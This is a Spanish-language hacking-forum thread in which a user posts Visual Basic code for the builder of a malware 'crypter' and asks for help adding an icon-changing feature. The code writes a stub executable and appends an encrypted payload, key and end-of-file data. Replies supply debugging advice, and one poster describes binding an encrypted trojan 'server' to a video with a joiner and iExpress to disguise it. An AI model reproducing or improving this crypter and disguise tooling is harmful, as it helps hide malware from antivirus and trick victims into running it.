Hola, miren ando toqueteando un crypter que encontre por este foro, al cual le quiero poner entre otras cosas que me deje seleccionar el icono que yo quiera para cambiarlo. Lo tengo todo listo pero me he qedado pillado en esto y no puedo continuar.
Explico un poco tengo un modulo pe para la encryptacion, otro modulo peicon para el icono, un modulo iconchanger para cambiar el icono.

Ahora en la situación que está el programa no me da error alguno, me abre tanto el archivo a encriptar como el de seleccionar icono, como tambien me aparece el icono el la image1 colocada en el form y me encripta ; pero si no selecciono el optionbutton op1 si lo selecciono, el commandbutton no me funciona

Bien aqui les dejo el code del boton del commandbuton que es el que doy para encryptar y crear el ejecutable con el icino nuevo en su caso:

Código: Seleccionar todo

Private Sub chameleonButton3_Click()
On Error GoTo ende
    Dim Buffer() As Byte
    Dim ResBuffer() As Byte
    Dim EofData As String
    Dim Buffer2 As String
    Dim Stubpath As String
        
         Dim eRR As String
         
        
    With CommonDialog1
        .CancelError = True
        .DialogTitle = "Select where to save the crypted file.."
        .DefaultExt = ".exe"
        .Filter = "Executables|*.exe"
        .FileName = "Crypted232.exe"
        
'Cambiar icono
        If Op1.Value = True Then
ReplaceIcons cuadro.FileName, App.Path + "\" + "Crypted111" + ".exe", eRR
End If
    End With
    
      
   
    CommonDialog1.ShowSave
    Stubpath = CommonDialog1.FileName
    
    ResBuffer() = LoadResData(101, "STUB")
    Open Stubpath For Binary As #2
    Put #2, , ResBuffer()
    Close #2

    Text3.Text = Text3.Text & "File read.." & vbCrLf
    Text3.Text = Text3.Text & "Crypting.." & vbCrLf
    
    EncodeArrayB LoadFile(Text1.Text), Text2.Text
    Buffer() = encoded()
    
    Buffer2 = StrConv(LoadFile(Text1.Text), vbUnicode)
    EofData = Mid(Buffer2, GetEOF(Text1.Text), FileLen(Text1.Text))
   
        


    Open Stubpath For Binary As #1
    Put #1, LOF(1) + 1, "<F1l3>"
    Put #1, LOF(1) + 1, Buffer()
    Put #1, LOF(1) + 1, "<F1l3>"
    Put #1, LOF(1) + 1, Text2.Text
    Put #1, LOF(1) + 1, "<F1l3>"
    Put #1, LOF(1) + 1, EofData
    Close #1
    
   

    'PatchEOF Stubpath 'removed cause it crashes the eof data
    
    Open Stubpath For Binary As #1
    Put #1, LOF(1) + 1, EofData
    Close #1
    
    
    


    Text3.Text = Text3.Text & "Successfull!" & vbCrLf
    MsgBox "The file has been successfully crypted", 64, "Lilith"
ende:
End Sub

He probado a mover la parte del cambio de icono por todas partes, si la pongo al fina me encrypta este o no marcado el op1 pero no me cambia en ninguno de los casos el icono.

Gracias, espero vuestra ayuda. Si necestais mas codigo o estais interesados en ayudarme aki me teneis con ganas de aprender XD. Saludos!
....................................................................
Imagen


Continuamente aprendiendo.
el cambio de icono se aplica DESPUES de la encriptacion, sino no funciona
¿Como te Enteraste que papa noel no existia?
Thor escribió:Le metí un troyano a mis padres y vi como compraban los regalos por ebay.
SharkI escribió: Puede ser porque el programa lo cree yo?.. y no insultes porque te cierro la boca de un tortazo puto EMO de mierda.
el cambio de icono se aplica DESPUES de la encriptacion, sino no funcionay conrespecto a lo del boton, con lo del boton, se te ponen las letras de este en gris???? si es asi entonces tienes que cambiarle la configuraciona enabled= yes, lo haces seleccionando el boton y en la parte de la derecha te va a salir un cuadro, ahi buscas esa opcion
¿Como te Enteraste que papa noel no existia?
Thor escribió:Le metí un troyano a mis padres y vi como compraban los regalos por ebay.
SharkI escribió: Puede ser porque el programa lo cree yo?.. y no insultes porque te cierro la boca de un tortazo puto EMO de mierda.
Gracias por conestar, pero tambien probe a ponerlo a final del todo y si hago esto como ya dije, encripta a la perfeccion pero no me cambia el icono, esté o no marcada la opcion.

Sigueme ayudando please ya que estoy metido en esto y hasta que no lo ruelva no puedo seguir.

Saludos.
....................................................................
Imagen


Continuamente aprendiendo.
yo despues de encryptar el server lo adjunto a un video con joiner y funciona pero al cambiar el icono con el cambiador de iconos del billar o reshacker ya no me va si es verdad que mejor con el billar creo que tiene algo que ver la resolucion del icono no tengo ni p...a idea soy muy baby si te ayudado en algo suerte si no es porque tu sabras mas que yo en esto contestame porfavor un saludo
La felicidad es una cualidad evasiva. Si la buscas, no la encuentras.
Imagen
se me olvido comentarte que con iexpress va de lujo todo siempre que sea una fusion con programas con video tampoco me funciona ni con imagen tampoco un saludo
La felicidad es una cualidad evasiva. Si la buscas, no la encuentras.
Imagen
Gracias, aunque ya lo solucioné. Era una tonteria... Lo que te pasa con billar seguramente sea por la resolución.

Saludos.

PD:Edita el mismo post y no postes 2.
....................................................................
Imagen


Continuamente aprendiendo.
Mirate un code que hize yo sobre como añadir un icono con Reshacker, es muy muy sencillo para que lo enteindas con rapidez, además como habrás usado el programa sabrás como va y tal
Imagen
Responder

Volver a “VB/.NET”